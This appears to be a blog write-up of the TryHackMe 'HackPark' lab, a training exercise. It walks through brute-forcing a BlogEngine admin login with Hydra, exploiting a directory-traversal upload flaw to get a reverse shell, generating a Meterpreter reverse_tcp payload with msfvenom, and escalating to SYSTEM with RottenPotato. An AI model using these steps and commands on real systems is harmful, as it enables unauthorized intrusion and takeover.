TryHackMe — HackPark Writeup
I have signed up for OSCP course path provided by TryHackMe to sharpen my skills and knowledge in the preparation for OSCP exam. I believe that publishing the Writeups after each CTF challenge, will help me in many ways.
Let’s start hacking by firing up the usual Nmap scan.
Nmap revealed the following. Nothing interesting came up.
Tried accessing the Website.
I used Gobuster to discover the hidden directories of the website.
Gobuster released that there is a hidden directory named admin, so I tried accessing that directory, which took me to below login page.
Its asking for username and password to login.
I dug deep to find out whether the credentials have mistakenly been saved in another hidden directory. I couldn’t find anything. Therefore, I decided to use Hydra to bruteforce the login.
Used Burpsuite to intercept the post request to get the key fields that are essential for Hydra web form attack.
I assumed that username was “admin” and used “rock you” as the wordlist to crack the password.
I successfully managed to crack the password using Hydra as shown below.
Logged into HackPark admin portal using the password retrieved from the bruteforce attack. 🙌🙌🙌
You can see the dashboard once you are logged in. By going to “About” section, you can confirm the version of the BlogEngine.
BlogEngine is an open source ASP.NET Blogging platform.
Moving on, my main goal was to check whether there were any public exploits for” Blogengine 3.3.6”. Luckily, I found one that matched the exact version in Exploit-DB.
Reading through the exploit, I found out that BlogEnginer was vulnerable for Directory Traversal RCE. Which means it allows me to access restricted directory on the webpage, upload a remote file and obtain a reverse shell. Click here to get the exploit details.
By visiting this directory below, I was able to upload the remote file. The remote file must be “ascx” as per the instructions.
http://10.10.10.10/admin/app/editor/editpost.cshtml
Uploaded the file.
Opened a netcat listener and visited the following location. Consequently, it triggered the reverse shell and opened a netcat session.
http://10.10.110.35//?theme=../../App_Data/files
The Netcat session is unsteady hence I upgraded the reverse shell into a full reverse shell via Metasploit.
Generated a payload using Msfvenom
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe > shall.exe
Hosted a python session before transferring the shell to the compromised machine.
Uploaded the payload to the target.
Opened msfconsole, setup a handler and executed the shell.exe file on the compromised machine.
I got a stable a low — privilege Meterpreter session.
The last piece of the puzzle was to escalated the privileges to get root access.
I first tried using Metasploit exploit suggester which wasn’t useful.
Tried using Python Windows Exploit Suggester which discovered several vulnerabilities.
Tried a few of them which ended up without any success then I came cross this vulenraibility named MS16–075
“MS16–075 is a vulnerability allows elevation of privilege if an attacker logs on to the system and runs a specially crafted application. ”
I chose the RottenPotato to exploit this vulnerability.
RottenPotato exploit can be download from here
Transferred the RottenPotato.exe to the compromised machine.
Executed the file
Listed the available tokens and found out “BUILTIN\Administrators” can be impersonated.
Even though you have a higher privileged token you may not actually have the permission of a privilege user (This is mainly due to the way Windows handles permission — it uses the primary token of the process and not the impersonated token to determine what the process can or cannot do.)
I made sure to impersonate token privileges and migrated the process with correct permissions to get SYSTEM user. I chose svchost.exe to migrate the process. 💪💪💪💪
